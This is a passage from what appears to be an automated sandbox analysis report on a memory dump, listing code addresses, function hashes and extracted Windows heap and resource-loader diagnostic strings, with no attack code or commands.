                                                0x013950ad
                                                0x013950ad
                                                0x00000000
                                                0x0139509d
                                                0x01394b58
                                                0x01394b5b
                                                0x01394b5e
                                                0x01394b63
                                                0x01394b66
                                                0x01394b69
                                                0x01394b6f
                                                0x01394be4
                                                0x01394bf0
                                                0x01394bf2
                                                0x01394bf5
                                                0x01394dc3
                                                0x01394dc6
                                                0x01394dc9
                                                0x01394dce
                                                0x01394dce
                                                0x01394dd0
                                                0x01394dd0
                                                0x01394dd5
                                                0x01394def
                                                0x01394dd7
                                                0x01394de7
                                                0x01394de7
                                                0x01394df3
                                                0x01395001
                                                0x01395007
                                                0x0139500b
                                                0x0139502a
                                                0x0139502f
                                                0x0139500d
                                                0x01395022
                                                0x01395027
                                                0x01395039
                                                0x0139503a
                                                0x0139503b
                                                0x00000000
                                                0x01394df9
                                                0x01394dfd
                                                0x01394e90
                                                0x01394e94
                                                0x01394e9e
                                                0x01394ea4
                                                0x01394ea4
                                                0x01394ea4
                                                0x01394ea6
                                                0x01394ea6
                                                0x00000000
                                                0x01394ea6
                                                0x01394e03
                                                0x01394e08
                                                0x01394f88
                                                0x01394f92
                                                0x01394f99
                                                0x01394f9c
                                                0x01394fe0
                                                0x01394fe4
                                                0x01394fee
                                                0x01394ff4
                                                0x01394ff4
                                                0x01394ff4
                                                0x00000000
                                                0x01394fe4
                                                0x01394f9e
                                                0x01394fa4
                                                0x01394fa8
                                                0x01394fc7
                                                0x01394fcc
                                                0x01394faa
                                                0x01394fbf
                                                0x01394fc4
                                                0x01394fd2
                                                0x01394fd5
                                                0x01394fd6
                                                0x01394f34
                                                0x01394f34
                                                0x00000000
                                                0x01394f39
                                                0x01394e0e
                                                0x01394e14
                                                0x01394e1b
                                                0x01394e25
                                                0x01394e2b
                                                0x01394e2b
                                                0x01394e33
                                                0x01394e38
                                                0x01394e8a
                                                0x01394e8a
                                                0x00000000
                                                0x01394e3a
                                                0x01394e3e
                                                0x01394e43
                                                0x01394e47
                                                0x01394e53
                                                0x01394e58
                                                0x01394e5a
                                                0x01394e5c
                                                0x01394e61
                                                0x01394e61
                                                0x01394e5a
                                                0x01394e6e
                                                0x01394f41
                                                0x01394f47
                                                0x01394f4b
                                                0x01394f6a
                                                0x01394f6f
                                                0x01394f4d
                                                0x01394f62
                                                0x01394f67
                                                0x01394f7f
                                                0x01394f80
                                                0x01394f81
                                                0x00000000
                                                0x01394e74
                                                0x01394e78
                                                0x01394e82
                                                0x01394e88
                                                0x01394e88
                                                0x00000000
                                                0x01394e78
                                                0x01394e6e
                                                0x01394e38
                                                0x01394df3
                                                0x01394bfe
                                                0x01394c01
                                                0x01394c04
                                                0x01394c07
                                                0x01394c09
                                                0x01394c0c
                                                0x01394c0e
                                                0x01394c0e
                                                0x01394c11
                                                0x01394c11
                                                0x01394c0c
                                                0x01394c14
                                                0x01394c17
                                                0x01394dae
                                                0x01394db2
                                                0x01394db7
                                                0x01394dba
                                                0x01394dbd
                                                0x01394ef1
                                                0x01394ef7
                                                0x01394efb
                                                0x01394f1a
                                                0x01394f1f
                                                0x01394efd
                                                0x01394f12
                                                0x01394f17
                                                0x01394f2b
                                                0x01394f2b
                                                0x01394f2d
                                                0x01394f2e
                                                0x01394f2f
                                                0x00000000
                                                0x01394f2f
                                                0x00000000
                                                0x01394c1d
                                                0x01394c1d
                                                0x01394c20
                                                0x01394c23
                                                0x01394c26
                                                0x01394c29
                                                0x01394c2c
                                                0x01394c2e
                                                0x01394d91
                                                0x01394d91
                                                0x01394d92
                                                0x01394d97
                                                0x01394d9e
                                                0x00000000
                                                0x01394d9e
                                                0x01394c34
                                                0x01394c37
                                                0x01394c39
                                                0x01394c3c
                                                0x00000000
                                                0x00000000
                                                0x01394c45
                                                0x01394c48
                                                0x01394c4e
                                                0x01394c50
                                                0x01394c78
                                                0x01394c78
                                                0x01394c7b
                                                0x01394c7d
                                                0x01394c80
                                                0x01394c84
                                                0x01394cad
                                                0x01394cad
                                                0x01394cb0
                                                0x01394cb8
                                                0x01394cbb
                                                0x01394cbe
                                                0x01394cc1
                                                0x01394cc7
                                                0x01394cdc
                                                0x01394cc9
                                                0x01394cd2
                                                0x01394cd4
                                                0x01394cd4
                                                0x01394cde
                                                0x01394ce0
                                                0x01394d13
                                                0x01394d13
                                                0x01394d16
                                                0x01394d18
                                                0x01394d29
                                                0x01394d2a
                                                0x01394d2c
                                                0x01394d34
                                                0x01394d1a
                                                0x01394d1a
                                                0x01394d1a
                                                0x01394d1d
                                                0x01394d1f
                                                0x01394d22
                                                0x01394d24
                                                0x01394d24
                                                0x01394d3c
                                                0x01394d3f
                                                0x01394d45
                                                0x01394d47
                                                0x01394d6c
                                                0x01394d6c
                                                0x01394d70
                                                0x01394d7e
                                                0x01394d84
                                                0x01394d84
                                                0x00000000
                                                0x01394d49
                                                0x01394d49
                                                0x01394d56
                                                0x01394d56
                                                0x01394d59
                                                0x00000000
                                                0x00000000
                                                0x01394d4e
                                                0x01394d50
                                                0x01394d52
                                                0x01394d8e
                                                0x01394d5d
                                                0x01394d5f
                                                0x01394d67
                                                0x00000000
                                                0x01394d67
                                                0x01394d54
                                                0x01394d54
                                                0x01394d5b
                                                0x00000000
                                                0x01394d5b
                                                0x01394ce2
                                                0x01394ce2
                                                0x01394ce5
                                                0x01394ce5
                                                0x01394ce7
                                                0x01394cfb
                                                0x01394ce9
                                                0x01394ce9
                                                0x01394cec
                                                0x01394cef
                                                0x01394cf1
                                                0x01394cf3
                                                0x01394cf3
                                                0x01394cf3
                                                0x01394cf6
                                                0x01394cf6
                                                0x01394d02
                                                0x01394d05
                                                0x00000000
                                                0x00000000
                                                0x01394d07
                                                0x01394d0f
                                                0x01394d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01394d11
                                                0x00000000
                                                0x01394ce5
                                                0x01394ce0
                                                0x01394c8a
                                                0x01394c8f
                                                0x01394c91
                                                0x00000000
                                                0x00000000
                                                0x01394c9d
                                                0x00000000
                                                0x01394c9d
                                                0x01394c52
                                                0x01394c5f
                                                0x01394c5f
                                                0x01394c62
                                                0x00000000
                                                0x00000000
                                                0x01394c57
                                                0x01394c59
                                                0x01394c5b
                                                0x01394caa
                                                0x01394c66
                                                0x01394c68
                                                0x01394c70
                                                0x01394c75
                                                0x00000000
                                                0x01394c75
                                                0x01394c5d
                                                0x01394c5d
                                                0x01394c64
                                                0x00000000
                                                0x01394c64
                                                0x01394c17
                                                0x01394b75
                                                0x01394bc4
                                                0x01394bc8
                                                0x00000000
                                                0x00000000
                                                0x01394bd9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01394b77
                                                0x01394b7a
                                                0x01394b8c
                                                0x01394b7c
                                                0x01394b7e
                                                0x01394b83
                                                0x01394b86
                                                0x01394b86
                                                0x01394b90
                                                0x01394b93
                                                0x00000000
                                                0x00000000
                                                0x01394b95
                                                0x01394bab
                                                0x01394bb0
                                                0x00000000
                                                0x00000000
                                                0x01394bb2
                                                0x01394bb9
                                                0x00000000
                                                0x00000000
                                                0x01394bbb
                                                0x01394bbe
                                                0x01394bc1
                                                0x01394bc1
                                                0x00000000
                                                0x01394bc1
                                                0x01394b97
                                                0x01394ba4
                                                0x00000000
                                                0x00000000
                                                0x01394ba6
                                                0x00000000
                                                0x01394ba6
                                                0x01394ea9
                                                0x01394ea9
                                                0x01394eb2
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 5bec4fe79b5109c410b0e5e92cc70b8a1ba89b25e832f38377dc5944e65a4ed7
                                                • Instruction ID: 3d109f1b85d3a6489bab8007655e18cb5c797d959bda5990633bb4b4738f2100
                                                • Opcode Fuzzy Hash: 5bec4fe79b5109c410b0e5e92cc70b8a1ba89b25e832f38377dc5944e65a4ed7
                                                • Instruction Fuzzy Hash: 4A12DE306106469FEF25CF29C594BBABBF5FF08708F14845DE58A8B642D734E882CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013078A0, Relevance: 8.5, Strings: 6, Instructions: 989COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$MUI$R$T${
                                                • API String ID: 0-2515562510
                                                • Opcode ID: 004139a7a1680403b9a21d050239407ff36ad818ae6617d246768bf2ae4d5b3d
                                                • Instruction ID: af88c69876fbde400188f095e9ff400c2cb44747ac69c517d5e727afed24a2fb
                                                • Opcode Fuzzy Hash: 004139a7a1680403b9a21d050239407ff36ad818ae6617d246768bf2ae4d5b3d
                                                • Instruction Fuzzy Hash: E6924C70E04219CFDF66CF98C890BADBBF5BF45308F148299D999AB291D734A941CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: c8ae87c90573a497f8a781e63efa31747a3909b45f8d2bed60f366ba496c72c7
                                                • Instruction ID: 1e2b61ec175a55a333e48e5cb7ca49c819b65f86be49c1dc6a9ad5bb78f6474b
                                                • Opcode Fuzzy Hash: c8ae87c90573a497f8a781e63efa31747a3909b45f8d2bed60f366ba496c72c7
                                                • Instruction Fuzzy Hash: CC42DE316287429FD715CF28C884A2AFBE5FF98708F04496DF68A8B352D774E981CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                Download Yara Rule
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 012E3F70
                                                • Kernel-MUI-Language-Disallowed, xrefs: 012E3E97
                                                • Kernel-MUI-Number-Allowed, xrefs: 012E3D8C
                                                • Kernel-MUI-Language-Allowed, xrefs: 012E3DC0
                                                • WindowsExcludedProcs, xrefs: 012E3D6F
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: b8e71f234ae7a0df13611dee3cfecfe3bbfb0dcc12715f6bdddf728dbd288ce3
                                                • Instruction ID: 9573676fe1a577087dc1c6d54895ff182eb98f12d7bd0159c30ade4ecc1203c9
                                                • Opcode Fuzzy Hash: b8e71f234ae7a0df13611dee3cfecfe3bbfb0dcc12715f6bdddf728dbd288ce3
                                                • Instruction Fuzzy Hash: E5F15D72D20259EFCB15EF98C984AEEBBF9FF48650F14016AE605E7211D7749E01CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                • API String ID: 0-188067316
                                                • Opcode ID: 4f1522c3f9a7ffa038058ee513712be8e7276e66ecd2a8876fee646a026e1681
                                                • Instruction ID: 8b2b947105aeaff87bc7630d8fe3f8d38e316f720eab31f015f97872bb37b0cd
                                                • Opcode Fuzzy Hash: 4f1522c3f9a7ffa038058ee513712be8e7276e66ecd2a8876fee646a026e1681
                                                • Instruction Fuzzy Hash: C501FC331342429ED22D9779E45EFA277F8DB41F74F19806DF00567781DAA4D480CA15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130701D, Relevance: 5.6, Strings: 4, Instructions: 569COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: #$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                • API String ID: 0-3266796247
                                                • Opcode ID: 9f960669baf830e3085db00f414158ed0531531efe20f6743dbedcd9bd970427
                                                • Instruction ID: f84ec009344e53d739b7b71861fd8b045ac6109b31c2236d778080dd9ca98cbb
                                                • Opcode Fuzzy Hash: 9f960669baf830e3085db00f414158ed0531531efe20f6743dbedcd9bd970427
                                                • Instruction Fuzzy Hash: B232B3319042698BDF27CF58C864BEDBBF9AF45348F1440E9E989A7291D730AE81CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 013422D7, 013423E7
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013422F3
                                                • HEAP: , xrefs: 013422E6, 013423F6
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01342403
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                • API String ID: 0-1657114761
                                                • Opcode ID: 53d58bb1692251fc685b5fe2e7c878783a2a858110d3aa66f32d29e40f42ea10
                                                • Instruction ID: 4d233a0a177e657aa0ab91f7de258e292fd520d2fee5f1127483048ecfc31e8d
                                                • Opcode Fuzzy Hash: 53d58bb1692251fc685b5fe2e7c878783a2a858110d3aa66f32d29e40f42ea10
                                                • Instruction Fuzzy Hash: 57D1AC34A206468FDB19CF68C490BBAFBF1BF48304F15857DEA5A9B345E370A945CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FD1EF, Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 0134344A
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 0134348D
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 013434D0
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01343513
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 7fa6980fc39845975e8370564ac50862b5b79f70e2802642cc287efeb35d035a
                                                • Instruction ID: 78314748d68b5317f13551363085b05570dfed97057b98516f7df42dc9b96ed2
                                                • Opcode Fuzzy Hash: 7fa6980fc39845975e8370564ac50862b5b79f70e2802642cc287efeb35d035a
                                                • Instruction Fuzzy Hash: E371E0B59043099FC721DF98C885B9BBBA8EF547A8F40446CFA498B247D734D588CBD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 2994545307-2586055223
                                                • Opcode ID: e05b623e36196744298fd81a8e1e945881b2685f1ab10bb3206e8fc3b63d2d52
                                                • Instruction ID: 668bcab54677eaf31209e25334624d326b786206411cc65bd3764c919d838719
                                                • Opcode Fuzzy Hash: e05b623e36196744298fd81a8e1e945881b2685f1ab10bb3206e8fc3b63d2d52
                                                • Instruction Fuzzy Hash: 245117723246819FD722DB68CC45F77BBE8FF81B54F050468F6958B291D764E840CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013949A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 2994545307-336120773
                                                • Opcode ID: b880bce3af920c7eb66053ae2e61130d0f348a83a7dfa267c36e4828471a8be6
                                                • Instruction ID: db62b722c0a281965d7b8ff653f0e16b65f67d630626af55b910413cacac9f6d
                                                • Opcode Fuzzy Hash: b880bce3af920c7eb66053ae2e61130d0f348a83a7dfa267c36e4828471a8be6
                                                • Instruction Fuzzy Hash: BF318632210105EFEB20DB6DCAC8F6B73E8EF00B68F154159F505CB240E674E941CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D751A, Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: 87677be75e243e4e19c708c400a8e389fa683cc1712f362ed6b09ce19aa3ed16
                                                • Instruction ID: fab486fa9ae4e8a281b4824233110085ee4c2a79345824e43e570906dc7edbf5
                                                • Opcode Fuzzy Hash: 87677be75e243e4e19c708c400a8e389fa683cc1712f362ed6b09ce19aa3ed16
                                                • Instruction Fuzzy Hash: 1B312732A20249AFDB11DB99CC84FABBBF8FF44724F158069F904AB241D774E940CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01393518, Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                • API String ID: 0-4256168463
                                                • Opcode ID: 74bef814a41548ae50fd49a6f0f5ddb9989d97338ef261b91309861c6c0819de
                                                • Instruction ID: 5728360dd0d45d33d0336b2ee8de070a0f0d5c4736cdc648856606d87ef38096
                                                • Opcode Fuzzy Hash: 74bef814a41548ae50fd49a6f0f5ddb9989d97338ef261b91309861c6c0819de
                                                • Instruction Fuzzy Hash: C6014572130205DFCF21EB7DC484BA673E9FF49B28F008459E406DB741DA70E840CA51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012F99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 4391d4f8bc4f5a36965c7298ed856d1b4c6a83fe491c51936349867c396b02f8
                                                • Instruction ID: 0be977ae5ef808e4a785f44cbd8100f5f817c8df04ff591fa2d4e551d2851005
                                                • Opcode Fuzzy Hash: 4391d4f8bc4f5a36965c7298ed856d1b4c6a83fe491c51936349867c396b02f8
                                                • Instruction Fuzzy Hash: 1D22FE70A106069FEB24CF29C485B7ABBF5EF44708F28856DE9468B346E774F884CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E62A0, Relevance: 4.0, Strings: 3, Instructions: 291COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: 81761cd6db57a888202651543e36c2415299824390d1f0155d3404f09e766b73
                                                • Instruction ID: 95e6605f46b934e399fa787012171ee44a646ad7a85f735fbaa5b6eeb9ef1887
                                                • Opcode Fuzzy Hash: 81761cd6db57a888202651543e36c2415299824390d1f0155d3404f09e766b73
                                                • Instruction Fuzzy Hash: 98B1E471B202169FDF15CF68D884BACBBB5BF64718F644029EA21EB384D771E850CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D8239, Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 418e8872cc1c4151f093257400954666f7f34208266cffc55e37a823166849b2
                                                • Instruction ID: a1ebdfd3669ab53e9effe640bd9ee4f4b7758c2143fa6c3a185e20551b0a452a
                                                • Opcode Fuzzy Hash: 418e8872cc1c4151f093257400954666f7f34208266cffc55e37a823166849b2
                                                • Instruction Fuzzy Hash: 32A18C319116699BDB31DF28CC88BAAF7B8FF44714F1001EAEA09A7250D735AE84CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013823E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                Download Yara Rule
                                                Strings
                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0138256F
                                                • HEAP[%wZ]: , xrefs: 0138254F
                                                • HEAP: , xrefs: 0138255C
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                • API String ID: 0-3815128232
                                                • Opcode ID: a8b3e5f2eb11788ebe336c6eef1194a1365b0eb2de166146feb47c1d485a5ebc
                                                • Instruction ID: 9481baad87224ff8f9e1f30482619ed4a341b9c45bb2dfe91a63445d35baf30a
                                                • Opcode Fuzzy Hash: a8b3e5f2eb11788ebe336c6eef1194a1365b0eb2de166146feb47c1d485a5ebc
                                                • Instruction Fuzzy Hash: 405120341103648EE734EF2EC854773BBF9EB48648F15489AE8C28B685D236E846DB30
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FEB9A, Relevance: 3.9, Strings: 3, Instructions: 156COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 013442A2
                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 013442BA
                                                • HEAP: , xrefs: 013442AF
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                • API String ID: 0-1596344177
                                                • Opcode ID: 23ed686f2c115cf55a20d6b2168e978360d81b6f12fc83be132c8f0a5f159a03
                                                • Instruction ID: 7a435c2ad963be4d18e44556ce6ea1d6db047101bb6b0d569b2c1a0abfaa66a6
                                                • Opcode Fuzzy Hash: 23ed686f2c115cf55a20d6b2168e978360d81b6f12fc83be132c8f0a5f159a03
                                                • Instruction Fuzzy Hash: B151DE31A2051ADFCB15DF68C484B6AFBF5FF84314F1681ADEA059B352D770A942CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: de06bef26eaca583d60a387e37856af66f6e0068f2b5de63da68dbe4deada97b
                                                • Instruction ID: 9364d07b23e3197396f7450265c902aff7c0a700dae43d8e236b166d151e3344
                                                • Opcode Fuzzy Hash: de06bef26eaca583d60a387e37856af66f6e0068f2b5de63da68dbe4deada97b
                                                • Instruction Fuzzy Hash: 5911E2313345039FEB29DB29C495B36F7A9EF90B24F19813DE64ACB245E670E840CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012EBA00, Relevance: 3.1, Strings: 2, Instructions: 614COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: $$.mui
                                                • API String ID: 0-2138749814
                                                • Opcode ID: ed851e6c2e822cdcd4eab113b67ce67cfdd1eec3e946e03bed6397c5f716130b
                                                • Instruction ID: 8877ed5b8d143ec7fb9d2dafc076d6cdcf3578f85b42d4a5437664c6ce9fb724
                                                • Opcode Fuzzy Hash: ed851e6c2e822cdcd4eab113b67ce67cfdd1eec3e946e03bed6397c5f716130b
                                                • Instruction Fuzzy Hash: F6425C729126699FEF21CF58CC44BEAB7B8AF48314F4441E9E909E7252DB309E81CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E99C7, Relevance: 2.8, Strings: 2, Instructions: 294COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrResFallbackLangList Exit, xrefs: 012E9A04
                                                • LdrResFallbackLangList Enter, xrefs: 012E99F2
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-1720564570
                                                • Opcode ID: 29b0aaa67ee954d457bb40bb3b60b37fd5e8ed9f54b40e6124aa7a3815cd5edc
                                                • Instruction ID: 0c1aeba291d25145b01033490f97480a82f596a9c09ae83ab5bf1141cdd1873d
                                                • Opcode Fuzzy Hash: 29b0aaa67ee954d457bb40bb3b60b37fd5e8ed9f54b40e6124aa7a3815cd5edc
                                                • Instruction Fuzzy Hash: 80B1D031228386CBDB14CF18C484BAAB7E4FF85748F84892EF9859B391E774D984C756
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0139E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction ID: 267f77ba8034a36b7eaf53e7ce67298122a5e75d1703124b349afa7f832a3162
                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction Fuzzy Hash: 5C9180312083429FEB24CE29C841B5BBBE5BF84728F14893DF695CB280E774E904CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013551BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
